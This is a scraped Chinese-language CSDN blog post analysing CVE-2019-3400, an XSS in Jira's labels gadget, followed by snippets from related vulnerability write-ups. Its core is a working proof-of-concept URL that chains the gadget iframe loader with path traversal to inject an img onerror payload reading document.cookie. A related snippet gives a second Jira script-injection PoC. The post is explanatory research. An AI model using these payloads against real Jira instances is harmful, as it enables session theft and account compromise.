CVE-2019-3400:[Jira]XSS in the labels gadget

最新推荐文章于 2023-04-10 16:05:49 发布
最新推荐文章于 2023-04-10 16:05:49 发布
阅读量474 收藏
点赞数
分类专栏: Web 安全 java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/caiqiiqi/article/details/90212510
版权
安全 同时被 3 个专栏收录
264 篇文章 9 订阅
订阅专栏
Web
220 篇文章 7 订阅
订阅专栏
java
213 篇文章 3 订阅
订阅专栏

来源:https://jira.atlassian.com/browse/JRASERVER-69245
PoC:

http://cqq.com:8091/plugins/servlet/gadgets/ifr?url=http://cqq.com:8091/rest/gadgets/1.0/g/com.atlassian.jira.gadgets:labels-gadget/gadgets/labels-gadget.xml&up_projectid=../../../../../rest/gadget/1.0/issueTable/jql%3fjql=issuekey%253e1%2520OR%2520issuekey%2521=%2522%253cimg%2520src=x%2520onerror=alert(document.cookie)%253e%2522%26&up_isConfigured=true

在这里插入图片描述

首先,这个ifr这个gadget的功能就是跟上一个url参数,然后载入这个url页面:

http://cqq.com:8091/plugins/servlet/gadgets/ifr?url=

然后

http://cqq.com:8091/rest/gadget/1.0/issueTable/jql?jql=issuekey%3E1%20OR%20issuekey%21=%22%3Cimg%20src=x%20onerror=alert(document.cookie)%3E%22

issueTable这个gadget会反射用户的输入,由于响应的Content-Type为application/json,不能直接利用。
在这里插入图片描述
然后,

http://cqq.com:8091/rest/gadgets/1.0/g/com.atlassian.jira.gadgets:labels-gadget/gadgets/labels-gadget.xml

可以直接访问,而且其中有一段:
在这里插入图片描述

We can actually control the this.getPref("projectid") since the ifr-gadget allows you to provide parameters called up_X where X could be projectid and this.getPref("projectid") would then return that information.

caiqiiqi
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2019-13720:Chrome 0-day 漏洞利用
systemino的博客
11-07 1467
摘要 Kaspersky研究人员近日发现一个Google Chrome浏览器的新的未知漏洞利用。经Google研究人员确认,是一个0 day漏洞,CVE编号为CVE-2019-13720。 研究人员将相关攻击活动命名为Operation WizardOpium。目前还无法将该攻击活动与已知的攻击者联系在一起。但研究人员发现部分代码与Lazarus攻击中的代码很相似。从被攻击的站点来看,与早期D...
CVE-2019-5786 漏洞原理分析及利用
晓得哥的博客
07-02 1572
CVE-2019-5786 漏洞原理分析及利用 作者:Kerne7@知道创宇404实验室 时间:2020年6月29日 从补丁发现漏洞本质 首先根据谷歌博客收集相关CVE-2019-5786漏洞的资料:High CVE-2019-5786: Use-after-free in FileReader,得知是FileReader上的UAF漏洞。 然后查看https://github.com/chromium/chromium/commit/ba9748e78ec7e9c0d594e7edf7b2c07ea2a90
Apache Solr 远程命令执行漏洞 CVE-2019-0193 漏洞复现
ADummy的博客
02-28 488
Apache Solr 远程命令执行漏洞(CVE-2019-0193) by ADummy 0x00利用路线 ​ 创建核心—>选择debug模式—>写入exp—>命令执行 0x01漏洞介绍 ​ Apache Solr 是一个开源的搜索服务器。Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。此次漏洞出现在Apache Solr的DataImportHandler,该模块是一个可选但常用的模块,用于从数据库和其他源中提取数据。它具有一个功能
CVE-2018-20824:[Jira]XSS in WallboardServlet through the cyclePeriod parameter
公众号shadow sock7
05-14 612
https://jira.atlassian.com/browse/JRASERVER-69238 https://duncanhalley.co.uk/blog/building-a-wallboard-in-jira/ PoC: /plugins/servlet/Wallboard/?dashboardId=10100&dashboardId=10101&cyclePeriod...
CVE-2019-3402:[Jira]XSS in the labels gadget
公众号shadow sock7
08-15 666
https://jira.test.com/secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=x2rnu<script>alert(1)<%2Fscript>t1nmk&Search=Search ConfigurePortalPages.jspa页面的searc...
CVE-2019-8449:针对Jira v2.1的CVE-2019-8449漏洞-v8.3.4
03-08
CVE-2019-8449 低于v8.3.4的Jira版本的CVE-2019-8449 Exploit CVSS得分: 5.0 漏洞类型:信息泄露身份验证:不需要受影响的版本: 2.1-8.3.4 发布日期: 2019-09-11 漏洞数据库: : 描述版本8.4.0之前的Jira中的/ ...
CVE-2019-11708:针对Windows 64位版本的Firefox的完整漏洞利用链(CVE-2019-11708和CVE-2019-9810)
02-04
CVE-2019-11708和CVE-2019-9810的全链漏洞利用 这是针对Windows 64位Firefox的完整的浏览器入侵漏洞利用链(CVE-2019-11708和CVE-2019-9810)。 它使用CVE-2019-9810在内容流程以及父流程中获取代码执行,并使用CVE-...
CVE-2019-12814:CVE-2019-12814
05-26
**CVE-2019-12814:Jackson数据绑定库的远程代码执行漏洞** CVE-2019-12814是一个针对Java Jackson数据绑定库的重大安全漏洞,该漏洞允许攻击者通过恶意构造的JSON输入在解析过程中执行任意代码,从而可能导致系统...
sudo-cve-2019-18634:CVE-2019-18634的概念证明
03-21
**sudo CVE-2019-18634 概念证明** sudo(Superuser DO)是Linux和Unix系统中的一个命令行工具,允许普通用户以超级用户(root)或其他用户的身份执行命令,通常用于管理系统。这个概念证明是关于CVE-2019-18634...
cve-2019-1003000-jenkins-rce-poc:Jenkins RCE概念证明:SECURITY-1266 CVE-2019-1003000(脚本安全),CVE-2019-1003001(管道:Groovy),CVE-2019-1003002(管道:声明式)
02-05
SECURITY-1266 / CVE-2019-1003000(脚本安全性),CVE-2019-1003001(管道:Groovy),CVE-2019-1003002(管道:声明性) 一种概念验证,允许具有“总体/读取”权限和“作业/配置”(以及可选的“作业/构建”)的...
RDP漏洞[+CVE-2019-0708+]无损扫描工具GUI.rar
05-21
最新CVE-2019-0708poc ,懂得来,不懂得就别来了,360火神团队写的poc,亲测好用,用于自建,无损检测
linux 漏洞CVE-2019-14287和CVE-2021-4034
任雪飘的博客
02-26 4934
大家好,我是任雪飘,一个刚接触web的菜鸡。我们今天一起复现一下linux老版本漏洞,普通用户利用sudo获得系统root权限操作系统! 现在我们重新创建一个新用户 给这个用户设置策略,就是不给他root权限,气死你 ceshi1 这个账号确实没有了root 权限的身份了 现在我们测试这个漏洞是不是存在 既然是root 权限了,那我们修改其他用户的密码吧!看下图是不是完美了 到此处CVE-2019-14287 漏洞复现完毕。 接下 下来我们就要去玩脚本...
ES文件管理器未授权访问漏洞(CVE-2019-6447)
公众号shadow sock7
01-20 3889
漏洞描述 在受害者ES文件管理器启动一次后,会开放TCP端口59777作为HTTP服务器。攻击者可在没有访问控制的wifi环境下通过构造json请求,读取受害者的文件,启动受害者任意app。受害者手机无需root,攻击者也无需授权凭据。 影响范围: ES文件管理器 4.1.9.7.4 and below 经测试在root和非root手机上4.1.9.4版本ES文件管理器(http://shouji...
内网大杀器利用:CVE-2019-1040漏洞
systemino的博客
06-16 8500
概述 微软官方在6月补丁日中,发布了一枚重磅漏洞CVE-2019-1040的安全补丁。该漏洞存在于Windows大部分版本中,攻击者可以利用该漏洞可绕过NTLM MIC的防护机制,结合其他漏洞和机制,某些场景下可以导致域内的普通用户直接获取对于域控服务器的控制。 近日,对于此漏洞的利用细节被安全研究人员公布出来,利用此漏洞获取内网的控制变得非常可行,看他堪称内网大杀器,形成现实的巨大...
Jira集成方式:Cookie方式登录
知行合一 止于至善
06-17 4770
Jira的集成,官方推荐OAuth方式,当前版本也提供了OAuth1.0a的认证集成方式。但是如果用户的需求仅仅是在其集成的平台里面打开Jira页面,这种认证的方式受到事前必须Jira登录的限制,在很多场景中客户的使用感受都会受到影响。本文memo一下使用Cookie方式进行集成的简单方式。
Jira常用管理员操作
最新发布
alittleyatou的博客
04-10 580
【CustomFields】-【Configure】-【Add new context】-添加标签和描述,选择需要应用的项目和issue类型。返回字段【Configure】界面-【Edit Default value】即可为指定项目设置不同的默认值。1、同一个字段,在不同项目不同issue类型中设置不同的值。
Python:JIRA操作
m0_37586703的博客
08-10 4423
python JIRA操作
Jira未授权SSRF漏洞(CVE-2019-8451)
Li-D的博客
12-31 1509
漏洞描述 Jira的/plugins/servlet/gadgets/makeRequest资源存在SSRF漏洞,原因在于JiraWhitelist这个类的逻辑缺陷,成功利用此漏洞的远程攻击者可以以Jira服务端的身份访问内网资源。经分析,此漏洞无需任何凭据即可触发。 漏洞危害 远程攻击者可以利用此漏洞以Jira服务端的身份访问内网资源。 漏洞影响版本 Jira < 8.4.0 漏洞分析 两个关键信息点: • 漏洞点在/plugins/servlet/gadgets/makeRequest • 原因在
CVE-2019-11477漏洞详解详玩(删)
Netfilter
06-28 6292
几天前,为了备注,2019年的6月17号吧,一个Linux/FreeBSD系统的漏洞爆出,就是CVE-2019-11477,Netflix的公告为: https://github.com/Netflix/security-bulletins/blob/master/advisories/third-party/2019-001.md Redhat的链接为: https://access.redha...
CVE-2019-19781 Citrix漏洞:远程代码执行详解与检测
"本文将深入探讨CVE-2019-19781漏洞,该漏洞影响了Citrix Application Delivery Controller(ADC)和Citrix Gateway,可能导致远程代码执行(RCE)。我们将分析漏洞的成因、检测方法以及利用示例,帮助读者了解其...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值